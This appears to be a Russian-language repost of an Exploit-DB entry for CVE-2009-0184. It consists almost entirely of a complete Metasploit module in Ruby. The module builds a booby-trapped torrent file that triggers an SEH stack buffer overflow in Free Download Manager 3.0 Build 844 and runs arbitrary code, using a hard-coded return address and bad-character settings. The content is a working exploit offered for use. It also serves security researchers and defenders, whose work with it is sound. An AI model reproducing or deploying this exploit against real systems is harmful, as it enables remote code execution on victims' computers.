- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 16634
- Проверка EDB
-
- Пройдено
- Автор
- METASPLOIT
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2009-0184
- Дата публикации
- 2010-09-25
Код:
##
# $Id: fdm_torrent.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Free Download Manager Torrent Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Free Download Manager
3.0 Build 844. Arbitrary code execution could occur when parsing a
specially crafted torrent file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'SkD <skdrat[at]hotmail.com>',
'jduck',
],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-0184' ],
[ 'OSVDB', '54033' ],
[ 'BID', '33555' ],
[ 'URL', 'http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18' ],
[ 'URL', 'http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18' ],
[ 'URL', 'http://secunia.com/secunia_research/2009-5/' ],
[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1024,
'DisableNops' => 'True',
'BadChars' => "\x00\x2c\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Free Download Manager 3.0 (Build 844)',
{
'Ret' => 0x76051372 # pop/pop/ret @ msvcp60.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Feb 2 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.torrent']),
], self.class)
end
def exploit
bof = rand_text_alphanumeric(10004) + generate_seh_payload(target.ret)
# hit the end of the stack...
bof << rand_text(1000) * 50
len = rand(10*1024*1024)
info_hash = {
'length' => len,
'name' => bof,
'piece length' => len + rand(262144 - len),
'pieces' => rand_text(20),
}
ann_hash = {
'info' => info_hash,
}
encoded = bencode_hash(ann_hash)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(encoded)
end
# bencoding functions:
#
# http://wiki.theory.org/BitTorrentSpecification
#
def bencode_string(str)
ret = "%d:" % str.length
ret << str
return ret
end
def bencode_int(int)
ret = "i%de" % int
return ret
end
def bencode_item(item)
case item
when Fixnum
return bencode_int(item)
when String
return bencode_string(item)
when Hash
return bencode_hash(item)
else
throw("unsupported bencode data type! " + item.testzt)
end
end
def bencode_list(list)
ret = "l"
list.each do |el|
ret << bencode_item(el)
end
ret << "e"
return ret
end
def bencode_hash(hash)
ret = "d"
hash.keys.sort.each do |k|
ret << bencode_item(k)
ret << bencode_item(hash[k])
end
ret << "e"
return ret
end
end
- Источник
- www.exploit-db.com